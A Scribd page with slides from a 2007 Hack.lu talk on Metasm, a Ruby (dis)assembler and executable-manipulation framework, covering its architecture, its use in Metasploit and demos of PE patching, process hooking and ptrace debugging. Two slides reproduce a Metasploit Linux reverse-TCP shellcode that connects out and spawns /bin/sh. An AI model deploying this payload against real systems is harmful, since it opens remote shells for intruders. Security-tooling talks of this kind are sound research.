Scribd Logo
Upload

Welcome to Scribd!

  • Metasm: A Ruby (Dis) Assembler

    Uploaded by

    kurapix
    250 views26 pages
    Metasm is a full-Ruby standalone framework to manipulate machine code (static or dynamic) multi-cpu (ia32 / MIPS for now) multi-OS (Windows / Linux) distributed under the open-source LGPL license still under heavy developpement HACK.LU 2007 3 / 23 Metasm Demonstrations Architecture overview Assembly Disassembly Executable file handling C compiler Live process interaction Use cases Metasploit 3.

    Original Description:

    Original Title

    07-hacklu-metasm

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Metasm is a full-Ruby standalone framework to manipulate machine code (static or dynamic) multi-cpu (ia32 / MIPS for now) multi-OS (Windows / Linux) distributed under the open-source LGPL license still under heavy developpement HACK.LU 2007 3 / 23 Metasm Demonstrations Architecture overview Assembly Disassembly Executable file handling C compiler Live process interaction Use cases Metasploit 3.

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    250 views26 pages

    Metasm: A Ruby (Dis) Assembler

    Uploaded by

    kurapix
    Metasm is a full-Ruby standalone framework to manipulate machine code (static or dynamic) multi-cpu (ia32 / MIPS for now) multi-OS (Windows / Linux) distributed under the open-source LGPL license still under heavy developpement HACK.LU 2007 3 / 23 Metasm Demonstrations Architecture overview Assembly Disassembly Executable file handling C compiler Live process interaction Use cases Metasploit 3.

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 26

    Metasm

    a ruby (dis)assembler

    Yoann Guillot

    20 october 2007
    Metasm
    Demonstrations

    Presentation

    I am Yoann Guillot
    I work for Sogeti/ESEC in the security R&D lab

    Metasm HACK.LU 2007 2 / 23


    Architecture overview
    Assembly
    Disassembly
    Metasm Executable file handling
    Demonstrations C compiler
    Live process interaction
    Use cases
    Metasploit 3

    Plan

    1 Metasm
    Architecture overview
    Assembly
    Disassembly
    Executable file handling
    C compiler
    Live process interaction
    Use cases
    Metasploit 3

    2 Demonstrations
    Metasm HACK.LU 2007 3 / 23
    Architecture overview
    Assembly
    Disassembly
    Metasm Executable file handling
    Demonstrations C compiler
    Live process interaction
    Use cases
    Metasploit 3

    Introduction

    Metasm is a full-Ruby standalone framework


    To manipulate machine code (static or dynamic)
    Multi-CPU (Ia32/MIPS for now)
    Multi-OS (Windows/Linux)
    distributed under the open-source LGPL license
    http://metasm.cr0.org/
    still under heavy developpement

    Metasm HACK.LU 2007 4 / 23


    Architecture overview
    Assembly
    Disassembly
    Metasm Executable file handling
    Demonstrations C compiler
    Live process interaction
    Use cases
    Metasploit 3

    Architecture overview

    Metasm HACK.LU 2007 5 / 23


    Architecture overview
    Assembly
    Disassembly
    Metasm Executable file handling
    Demonstrations C compiler
    Live process interaction
    Use cases
    Metasploit 3

    Assembly

    EncodedData represents a relocatable binary string


    binary data
    arbitrary relocations
    exports
    virtual size
    used to dissociate assembly from linking

    Metasm HACK.LU 2007 6 / 23


    Architecture overview
    Assembly
    Disassembly
    Metasm Executable file handling
    Demonstrations C compiler
    Live process interaction
    Use cases
    Metasploit 3

    Assembly

    mov eax, dword ptr [toto]

    Metasm HACK.LU 2007 7 / 23


    Architecture overview
    Assembly
    Disassembly
    Metasm Executable file handling
    Demonstrations C compiler
    Live process interaction
    Use cases
    Metasploit 3

    Disassembly

    simple yet powerful backtracking engine


    emulates standard CPU instructions
    follows precisely code flow
    currently unfinished
    trace data access
    handle subfunctions
    handle external API calls
    minimal arch-specific developpement

    Metasm HACK.LU 2007 8 / 23


    Architecture overview
    Assembly
    Disassembly
    Metasm Executable file handling
    Demonstrations C compiler
    Live process interaction
    Use cases
    Metasploit 3

    Handling executable files

    reading
    from a file
    directly in memory
    writing
    from scratch
    patch an existing exe
    currently supported formats: MZ / PE / COFF, ELF / a.out

    Metasm HACK.LU 2007 9 / 23


    Architecture overview
    Assembly
    Disassembly
    Metasm Executable file handling
    Demonstrations C compiler
    Live process interaction
    Use cases
    Metasploit 3

    C Compilation

    Metasm includes a complete C parser


    features header filtering
    basic compiler for Ia32

    Metasm HACK.LU 2007 10 / 23


    Architecture overview
    Assembly
    Disassembly
    Metasm Executable file handling
    Demonstrations C compiler
    Live process interaction
    Use cases
    Metasploit 3

    Live process interaction

    String-like process memory abstraction


    transparent read/write
    Ruby objects wrap the host OS debug API

    Metasm HACK.LU 2007 11 / 23


    Architecture overview
    Assembly
    Disassembly
    Metasm Executable file handling
    Demonstrations C compiler
    Live process interaction
    Use cases
    Metasploit 3

    When is it useful

    whenever you want to manipulate machine code or executable


    files
    it’s easy to hook/rewrite/customize any internal method

    Metasm HACK.LU 2007 12 / 23


    Architecture overview
    Assembly
    Disassembly
    Metasm Executable file handling
    Demonstrations C compiler
    Live process interaction
    Use cases
    Metasploit 3

    Metasploit 3 - before

    Metasploit 3 is also written in Ruby


    it had very bad machine code support
    hexadecimal static shellcodes
    hacks to patch the shellcodes with user-specified values
    more hacks to link stages

    Metasm HACK.LU 2007 13 / 23


    Architecture overview
    Assembly
    Disassembly
    Metasm Executable file handling
    Demonstrations C compiler
    Live process interaction
    Use cases
    Metasploit 3

    Metasploit 3 - before
    [metasploit3/.../reverse tcp.rb]

    ’Payload’ =>
    {
    ’Offsets’ =>
    {
    ’LHOST’ => [ 0x1a, ’ADDR’ ],
    ’LPORT’ => [ 0x20, ’n’ ],
    },
    ’Payload’ =>
    "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59" +
    "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x7f\x00\x00\x01\x66\x68" +
    "\xbf\xbf\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd" +
    "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" +
    "\x89\xe1\xb0\x0b\xcd\x80"
    }

    Metasm HACK.LU 2007 14 / 23


    Architecture overview
    Assembly
    Disassembly
    Metasm Executable file handling
    Demonstrations C compiler
    Live process interaction
    Use cases
    Metasploit 3

    Metasploit 3 - now
    [metasploit3/.../reverse tcp2.rb]

    ’Payload’ => {
    ’Offsets’ => {
    ’LHOST’ => [ 0, ’ADDR’ ],
    ’LPORT’ => [ 0, ’n’ ],
    },
    ’Assembly’ => <<EOS
    xor ebx, ebx ; @00000000 31db
    [...]
    pop edx ; @00000018 5a
    push LHOST ; @00000019 687f000001
    push.i16 LPORT ; @0000001e 6668bfbf
    [...]
    push ’//sh’
    push ’/bin’
    [...]
    mov al, 0bh ; @00000042 b00b
    int 80h ; @00000044 cd80
    EOS
    }

    Metasm HACK.LU 2007 15 / 23


    Architecture overview
    Assembly
    Disassembly
    Metasm Executable file handling
    Demonstrations C compiler
    Live process interaction
    Use cases
    Metasploit 3

    Metasploit 3 - now

    Metasm is now included in Metasploit


    shellcodes can be in source from
    standard Metasm relocation handling may be used for
    shellcode patching/linking
    ???
    Profit !

    Metasm HACK.LU 2007 16 / 23


    metasm-shell
    Metasm
    Exe manipulation
    Demonstrations
    Live process interaction

    Plan

    1 Metasm

    2 Demonstrations
    metasm-shell
    Exe manipulation
    Live process interaction

    Metasm HACK.LU 2007 17 / 23


    metasm-shell
    Metasm
    Exe manipulation
    Demonstrations
    Live process interaction

    metasm-shell

    metasm-shell
    adds metasm methods to standard Ruby Strings
    offers an interactive assembler shell

    Metasm HACK.LU 2007 18 / 23


    metasm-shell
    Metasm
    Exe manipulation
    Demonstrations
    Live process interaction

    Exe manipulation

    reading a MIPS ELF

    Metasm HACK.LU 2007 19 / 23


    metasm-shell
    Metasm
    Exe manipulation
    Demonstrations
    Live process interaction

    Exe manipulation

    reading a MIPS ELF


    compiling a simple PE [samples/testpe.rb]

    Metasm HACK.LU 2007 19 / 23


    metasm-shell
    Metasm
    Exe manipulation
    Demonstrations
    Live process interaction

    Exe manipulation

    reading a MIPS ELF


    compiling a simple PE [samples/testpe.rb]

    patching a PE [samples/pe-hook.rb]

    Metasm HACK.LU 2007 19 / 23


    metasm-shell
    Metasm
    Exe manipulation
    Demonstrations
    Live process interaction

    Windows process hooking

    simple IAT hook [samples/win32hooker.rb]

    Metasm HACK.LU 2007 20 / 23


    metasm-shell
    Metasm
    Exe manipulation
    Demonstrations
    Live process interaction

    Windows process hooking

    full-library hook [samples/win32hooker-advanced.rb]


    redirect all exported function to a custom hook

    Metasm HACK.LU 2007 21 / 23


    metasm-shell
    Metasm
    Exe manipulation
    Demonstrations
    Live process interaction

    Linux debugging

    ptrace wrapper [samples/rubstop.rb]


    singlestep, stepover, etc
    memory access
    PaX compatible

    Metasm HACK.LU 2007 22 / 23


    metasm-shell
    Metasm
    Exe manipulation
    Demonstrations
    Live process interaction

    Linux debugging

    ptrace wrapper [samples/rubstop.rb]


    singlestep, stepover, etc
    memory access
    PaX compatible
    UI [samples/lindebug.rb]
    console-mode only (for now)

    Metasm HACK.LU 2007 22 / 23


    metasm-shell
    Metasm
    Exe manipulation
    Demonstrations
    Live process interaction

    Conclusion

    Thanks for listening


    Questions ?

    Metasm HACK.LU 2007 23 / 23

    You might also like